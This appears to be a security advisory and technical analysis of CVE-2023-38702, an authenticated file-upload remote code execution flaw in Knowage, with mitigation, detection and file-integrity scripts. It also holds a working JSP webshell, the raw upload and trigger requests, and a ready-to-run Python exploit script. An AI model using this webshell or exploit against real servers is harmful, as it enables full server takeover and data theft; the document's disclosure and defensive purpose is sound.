CVE-2023-38702
Weakness (CWE)
CVSS Vector (v3.1)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope: Changed
- Confidentiality: High
- Integrity: High
- Availability: High
Description
Knowage is an open source analytics and business intelligence suite. Starting in the 6.x.x branch and prior to version 8.1.8, the endpoint `/knowage/restful-services/dossier/importTemplateFile` allows authenticated users to upload `template file` on the server, but does not need any authorization to be reached. When the JSP file is uploaded, the attacker just needs to connect to `/knowageqbeengine/foo.jsp` to gain code execution on the server. By exploiting this vulnerability, an attacker with low privileges can upload a JSP file to the `knowageqbeengine` directory and gain code execution capability on the server. This issue has been patched in Knowage version 8.1.8.
Comprehensive Technical Analysis of CVE-2023-38702 (Knowage Authenticated RCE Vulnerability)
1. Vulnerability Assessment and Severity Evaluation
CVE ID: CVE-2023-38702
CVSS Score: 9.9 (Critical) – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Vulnerability Type: Authenticated Remote Code Execution (RCE) via Unrestricted File Upload
Exploitability Metrics:
- Attack Vector (AV): Network (Exploitable remotely)
- Attack Complexity (AC): Low (No special conditions required)
- Privileges Required (PR): Low (Authenticated user with minimal privileges)
- User Interaction (UI): None
- Scope (S): Changed (Impacts the entire Knowage server)
- Confidentiality (C): High (Full system compromise possible)
- Integrity (I): High (Arbitrary code execution)
- Availability (A): High (Denial of service or full takeover)
Severity Justification
The vulnerability is critical due to:
- Low barrier to exploitation (only requires low-privilege authentication).
- High impact (arbitrary code execution on the server).
- No authorization checks on the vulnerable endpoint, allowing any authenticated user to upload malicious files.
- Immediate RCE upon successful exploitation, enabling full system compromise.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Workflow
1. Authentication:
   - An attacker must first authenticate to the Knowage application (even with minimal privileges, such as a "Viewer" role).
   - Credentials can be obtained via:
     - Phishing attacks.
     - Credential stuffing (if weak/default passwords are used).
     - Exploiting other vulnerabilities (e.g., weak session management).
2. Malicious File Upload:
   - The attacker sends a POST request to `/knowage/restful-services/dossier/importTemplateFile`.
   - The endpoint does not enforce authorization checks, allowing any authenticated user to upload files.
   - The attacker uploads a JSP (Java Server Pages) webshell disguised as a "template file."
3. Code Execution:
   - The uploaded JSP file is stored in the `knowageqbeengine` directory.
   - The attacker accesses the webshell via `/knowageqbeengine/[malicious_file].jsp`.
   - This executes arbitrary Java code on the server, granting full RCE.
Example Exploit (Proof of Concept)
```http
POST /knowage/restful-services/dossier/importTemplateFile HTTP/1.1
Host: vulnerable-knowage-server.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Cookie: JSESSIONID=[VALID_SESSION_ID]

------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="exploit.jsp"
Content-Type: application/octet-stream

<%@ page import="java.util.*,java.io.*"%>
<%
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
%>
------WebKitFormBoundary--
```
Triggering the Exploit:
```http
GET /knowageqbeengine/exploit.jsp?cmd=id HTTP/1.1
Host: vulnerable-knowage-server.com
```
Expected Output:
```
uid=0(root) gid=0(root) groups=0(root)
```
Post-Exploitation Impact
- Full system compromise (reverse shell, data exfiltration, lateral movement).
- Persistence mechanisms (cron jobs, backdoors, rootkits).
- Data theft (database access, sensitive reports, credentials).
- Denial of Service (DoS) (crashing the server or deleting critical files).
3. Affected Systems and Software Versions
| Software | Affected Versions | Patched Version |
|---|---|---|
| Knowage Server | 6.x.x – 8.1.7 | 8.1.8 |
| Knowage Suite (all components) | All versions prior to 8.1.8 | 8.1.8 |
Note:
- The vulnerability exists in the `/knowage/restful-services/dossier/importTemplateFile` endpoint.
- The `knowageqbeengine` directory is writable by the application, allowing JSP execution.
4. Recommended Mitigation Strategies
Immediate Actions
1. Apply the Patch (Highest Priority):
   - Upgrade to Knowage 8.1.8 or later.
   - Verify the patch by checking the GitHub advisory (GHSA-7mjh-73q3-c3fc).
2. Temporary Workarounds (If Patch Cannot Be Applied Immediately):
   - Disable the vulnerable endpoint via web server rules (e.g., Apache/Nginx `deny` directives).
   - Restrict file uploads to an allowlist of specific file types (e.g., `.xls`, `.csv`) and block `.jsp`, `.war`, `.jspx`.
   - Implement strict authorization checks on the `/dossier/importTemplateFile` endpoint (e.g., require admin privileges).
   - Monitor and block suspicious JSP file uploads using a Web Application Firewall (WAF).
3. Network-Level Protections:
   - Isolate the Knowage server in a segmented network.
   - Restrict access to the Knowage application via IP whitelisting.
   - Enable logging and alerting for file uploads to `/knowageqbeengine/`.
4. User Access Controls:
   - Enforce least privilege (avoid granting unnecessary upload permissions).
   - Rotate credentials for all Knowage users.
   - Enable Multi-Factor Authentication (MFA) for Knowage access.
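The two workaround items that matter most, an authorization check on the import endpoint and an allowlist on what may be uploaded, are shown together below as an added example. This is illustrative Python written for this page, not Knowage's code (Knowage is a Java application); the role name `admin`, the extension allowlist, the script markers and the storage path `/var/lib/knowage-templates` are all assumptions chosen for the example. The point it makes beyond the list above: take only the final path component of the client-supplied filename, judge the extension on the last suffix so `report.csv.jsp` is still a JSP, inspect content as well as name, and store outside the web root so a file that slips through still cannot be requested as a URL.

```python
import os
import re
from pathlib import PurePosixPath

# Roles permitted to import dossier templates. Assumption for this example;
# Knowage's own role names and checks are not reproduced here.
ALLOWED_ROLES = {"admin"}

# Allowlist of template extensions: anything not listed, including .jsp, .jspx
# and .war, is refused. An allowlist avoids the gaps a denylist leaves open.
ALLOWED_EXTENSIONS = {".xls", ".xlsx", ".csv", ".docx"}

# Byte patterns that mark server-side script content; a file carrying one of
# these in its head is refused whatever its name says.
SCRIPT_MARKERS = (b"<%", b"<jsp:", b"<script")

# Storage directory outside the servlet container's web root (assumed path),
# so nothing written here can be fetched as a URL.
TEMPLATE_STORE = "/var/lib/knowage-templates"


def sanitize_filename(name):
    """Drop any directory part (POSIX or Windows separators) and accept only a
    conservative character set, so '../' and NUL/percent tricks fail."""
    base = PurePosixPath(name.replace("\\", "/")).name
    if base in ("", ".", ".."):
        return None
    if not re.fullmatch(r"[A-Za-z0-9][A-Za-z0-9._-]{0,99}", base):
        return None
    return base


def upload_decision(user_roles, filename, data):
    """Return ("accept", destination_path) or ("reject", reason)."""
    if not set(user_roles) & ALLOWED_ROLES:
        return ("reject", "user is not authorized to import templates")
    safe_name = sanitize_filename(filename)
    if safe_name is None:
        return ("reject", "filename is empty, a traversal, or has disallowed characters")
    # splitext looks at the LAST suffix, so "report.csv.jsp" is judged as .jsp.
    ext = os.path.splitext(safe_name)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return ("reject", f"extension {ext or '(none)'} is not allowed")
    if any(marker in data[:4096] for marker in SCRIPT_MARKERS):
        return ("reject", "content contains server-side script markers")
    return ("accept", os.path.join(TEMPLATE_STORE, safe_name))


if __name__ == "__main__":
    # Constructed requests; the first two have the shape described in this advisory.
    for roles, name, body in [
        (["viewer"], "exploit.jsp", b"<% out.println(1); %>"),
        (["admin"], "exploit.jsp", b"<% out.println(1); %>"),
        (["admin"], "innocent.csv", b"<%@ page import=\"java.io.*\" %>"),
        (["admin"], "q1.csv", b"region,total\nEU,42\n"),
    ]:
        print(name, "->", upload_decision(roles, name, body))
```

The order of the checks is deliberate: authorization is decided before any byte of the upload is examined, so an unauthorized user learns nothing about what the validator accepts.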
Long-Term Security Hardening
- Regular vulnerability scanning (e.g., Nessus, OpenVAS, Burp Suite).
- File integrity monitoring (FIM) to detect unauthorized JSP file creation.
- Application security testing (SAST/DAST) for custom Knowage deployments.
- Incident response planning for RCE scenarios.
5. Impact on the Cybersecurity Landscape
Broader Implications
1. Increased Attack Surface for Business Intelligence (BI) Tools:
   - Knowage is widely used in enterprise analytics, making it a high-value target.
   - Similar vulnerabilities in BI tools (e.g., Tableau, Power BI) could lead to data breaches and corporate espionage.
2. Exploitation in Ransomware & APT Campaigns:
   - Ransomware groups (e.g., LockBit, BlackCat) may exploit this for initial access.
   - Advanced Persistent Threats (APTs) could use it for lateral movement in targeted attacks.
3. Supply Chain Risks:
   - Knowage is often integrated with ERP, CRM, and database systems, increasing the risk of supply chain attacks.
   - Compromised Knowage instances could lead to data exfiltration from connected systems.
4. Regulatory & Compliance Risks:
   - GDPR, HIPAA, SOX violations if sensitive data is exposed.
   - PCI DSS non-compliance if payment data is stored in Knowage reports.
Threat Actor Motivations
| Threat Actor | Likely Exploitation Goal |
|---|---|
| Cybercriminals | Ransomware deployment, data theft for extortion. |
| APT Groups | Espionage, intellectual property theft. |
| Insider Threats | Unauthorized data access, sabotage. |
| Script Kiddies | Defacement, bragging rights. |
6. Technical Details for Security Professionals
Root Cause Analysis
- Missing Authorization Check:
  - The `/dossier/importTemplateFile` endpoint does not verify user permissions, allowing any authenticated user to upload files.
- Insecure File Upload Handling:
  - The application does not validate file extensions or content, permitting `.jsp` files.
  - Uploaded files are stored in a web-accessible directory (`knowageqbeengine`), enabling direct execution.
Exploitation Requirements
| Requirement | Details |
|---|---|
| Authentication | Valid Knowage credentials (even low-privilege). |
| Network Access | HTTP/HTTPS access to the Knowage server. |
| File Upload | Ability to send a POST request with a malicious .jsp file. |
| Execution | Direct access to the uploaded JSP file via /knowageqbeengine/. |
Detection & Forensics
1. Log Analysis:
   - Check access logs for:
     - `POST /knowage/restful-services/dossier/importTemplateFile`
     - `GET /knowageqbeengine/*.jsp`
   - Look for unusual file uploads (e.g., `.jsp`, `.war`, `.jspx`).
2. File System Forensics:
   - Search for unexpected `.jsp` files in `/opt/knowage/tomcat/webapps/knowageqbeengine/`.
   - Check timestamps for recently modified files.
3. Network Traffic Analysis:
   - Monitor for outbound connections from the Knowage server (e.g., reverse shells, C2 traffic).
4. Endpoint Detection & Response (EDR):
   - Detect unusual child processes of the Knowage Tomcat service.
   - Alert on Java-based webshell execution.
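The log analysis step above becomes far more useful when the two indicators are correlated: a template upload on its own is normal administrative activity, but a request for a `.jsp` under `/knowageqbeengine/` from the same client shortly afterwards is the exploitation sequence this advisory describes. The script below is an added example written for this page, not a Knowage or Tomcat tool; it assumes Tomcat's common/combined access log layout, a one-hour correlation window, and the constructed sample lines embedded in `SAMPLE_LOG` (the IPs and timestamps are invented). It also reports every upload separately, since any upload by a non-administrative account should be reviewed even without a follow-up JSP request.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Tomcat access log in the common/combined layout; fields after the status
# code (size, referer, user-agent) are not needed by the pattern.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

UPLOAD_PATH = "/knowage/restful-services/dossier/importTemplateFile"
# Any .jsp/.jspx under the engine's web root, with or without a query string.
JSP_RE = re.compile(r"^/knowageqbeengine/[^?]*\.jspx?(\?|$)", re.IGNORECASE)

# Constructed sample: 10.0.0.7 uploads and then fetches a JSP (the exploitation
# sequence); 10.0.0.9 uploads but never requests anything under the engine.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Aug/2023:10:01:02 +0000] "GET /knowage/ HTTP/1.1" 200 5120
10.0.0.7 - - [12/Aug/2023:10:02:15 +0000] "POST /knowage/restful-services/dossier/importTemplateFile HTTP/1.1" 200 35
10.0.0.7 - - [12/Aug/2023:10:02:40 +0000] "GET /knowageqbeengine/exploit.jsp?cmd=id HTTP/1.1" 200 48
10.0.0.9 - - [12/Aug/2023:10:05:00 +0000] "POST /knowage/restful-services/dossier/importTemplateFile HTTP/1.1" 200 35
10.0.0.9 - - [12/Aug/2023:10:05:30 +0000] "GET /knowage/restful-services/2.0/documents HTTP/1.1" 200 900
"""


def parse_line(line):
    """Return a dict of the fields we use, or None for lines in another format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def analyze(log_text, window=timedelta(hours=1)):
    """Return template uploads, JSP requests under /knowageqbeengine/, and
    alerts where one client fetched a JSP within `window` after uploading."""
    uploads, jsp_requests = [], []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].split("?")[0] == UPLOAD_PATH:
            uploads.append(rec)
        elif JSP_RE.match(rec["path"]):
            jsp_requests.append(rec)

    upload_times = defaultdict(list)
    for u in uploads:
        upload_times[u["ip"]].append(u["ts"])

    alerts = []
    for j in jsp_requests:
        # timedelta(0) rather than 0: datetimes subtract to a timedelta.
        if any(timedelta(0) <= (j["ts"] - t) <= window for t in upload_times[j["ip"]]):
            alerts.append((j["ip"], j["path"]))
    return {"uploads": uploads, "jsp_requests": jsp_requests, "alerts": alerts}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for ip, path in result["alerts"]:
        print(f"ALERT  upload followed by JSP request from {ip}: {path}")
    for u in result["uploads"]:
        print(f"REVIEW template upload from {u['ip']} at {u['ts'].isoformat()}")
```

Correlating on client IP is the simplest key; where the log includes the authenticated user (the third field) or a session identifier, keying on that instead survives an attacker who changes source address between the upload and the trigger request.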
Proof-of-Concept (PoC) Exploit Code (For Authorized Testing Only)
```python
import requests
import sys

target = "http://vulnerable-knowage-server.com"
username = "low_priv_user"
password = "password123"

jsp_payload = """<%@ page import="java.util.*,java.io.*"%>
<%
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
%>"""

def exploit():
    # Authenticate
    session = requests.Session()
    login_url = f"{target}/knowage/restful-services/2.0/backend/login"
    login_data = {"user": username, "password": password}
    response = session.post(login_url, json=login_data)
    if response.status_code != 200:
        print("[!] Authentication failed")
        sys.exit(1)
    # Upload malicious JSP
    upload_url = f"{target}/knowage/restful-services/dossier/importTemplateFile"
    files = {"file": ("exploit.jsp", jsp_payload, "application/octet-stream")}
    response = session.post(upload_url, files=files)
    if response.status_code == 200:
        print("[+] JSP uploaded successfully")
    else:
        print("[!] Upload failed")
        sys.exit(1)
    # Trigger RCE
    rce_url = f"{target}/knowageqbeengine/exploit.jsp?cmd=id"
    response = session.get(rce_url)
    print("[+] Command output:")
    print(response.text)

if __name__ == "__main__":
    exploit()
```
Mitigation Verification
1. Test the Patch:
   - Attempt to upload a `.jsp` file after upgrading to Knowage 8.1.8.
   - Verify that the endpoint rejects unauthorized uploads.
2. Penetration Testing:
   - Use Burp Suite or OWASP ZAP to test for:
     - Unauthorized file uploads.
     - Directory traversal in file paths.
     - JSP execution in web-accessible directories.
3. Hardening Checklist:
   - Knowage is updated to 8.1.8+.
   - File upload restrictions are enforced.
   - WAF rules block `.jsp` uploads.
   - Least privilege is enforced for Knowage users.
   - Logging and monitoring are enabled for file uploads.
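The file system forensics step and the file integrity monitoring item in the hardening list both come down to one question: which `.jsp` files under the engine's web root were not shipped with the deployment? The added example below (written for this page, not a Knowage tool) answers it by hashing every JSP right after install or upgrade and later reporting files that are new or whose content changed. Point `build_baseline` and `find_unexpected_jsp` at the directory the advisory names, `/opt/knowage/tomcat/webapps/knowageqbeengine/`; `demo()` runs the same logic against a constructed temporary directory with invented file contents so it can be exercised offline.

```python
import hashlib
import shutil
import tempfile
from pathlib import Path

JSP_SUFFIXES = {".jsp", ".jspx"}


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def list_jsp(root):
    """Map relative POSIX path -> Path for every .jsp/.jspx below root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): p
            for p in root.rglob("*")
            if p.is_file() and p.suffix.lower() in JSP_SUFFIXES}


def build_baseline(root):
    """Hash the JSPs of a known-good deployment; run this straight after
    install or upgrade and keep the result off the server."""
    return {rel: sha256_of(p) for rel, p in list_jsp(root).items()}


def find_unexpected_jsp(root, baseline):
    """Report JSPs absent from the baseline (dropped after deploy) or whose
    content differs from it, with their modification time for triage."""
    findings = []
    for rel, p in sorted(list_jsp(root).items()):
        if rel not in baseline:
            findings.append({"path": rel, "reason": "new", "mtime": p.stat().st_mtime})
        elif baseline[rel] != sha256_of(p):
            findings.append({"path": rel, "reason": "modified", "mtime": p.stat().st_mtime})
    return findings


def demo():
    """Constructed scenario in a temp dir standing in for
    /opt/knowage/tomcat/webapps/knowageqbeengine/."""
    root = Path(tempfile.mkdtemp(prefix="knowageqbeengine-"))
    try:
        (root / "index.jsp").write_text("<%-- shipped page --%>")
        (root / "WEB-INF").mkdir()
        (root / "WEB-INF" / "web.xml").write_text("<web-app/>")
        baseline = build_baseline(root)
        # Events after the baseline: a dropped file and a tampered shipped page.
        (root / "exploit.jsp").write_text("<% /* stand-in for a dropped file */ %>")
        (root / "index.jsp").write_text("<%-- shipped page --%><% /* appended */ %>")
        return [(f["path"], f["reason"]) for f in find_unexpected_jsp(root, baseline)]
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{reason:9} {path}")
```

Hashing rather than relying on timestamps matters here: a modification time is trivially reset, while a content hash compared against a baseline stored elsewhere is not.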
Conclusion
CVE-2023-38702 is a critical RCE vulnerability in Knowage that allows low-privilege authenticated users to execute arbitrary code on the server. Due to its low exploitation complexity and high impact, organizations must patch immediately and implement defensive controls to prevent exploitation.
Key Takeaways for Security Teams:
- ✅ Patch Knowage to 8.1.8+ (highest priority).
- ✅ Restrict file uploads to prevent JSP execution.
- ✅ Monitor for exploitation attempts (log analysis, EDR).
- ✅ Enforce least privilege for Knowage users.
- ✅ Conduct penetration testing to verify mitigations.
Failure to address this vulnerability could lead to full system compromise, data breaches, and regulatory penalties. Organizations should treat this as a critical incident response scenario if exploitation is suspected.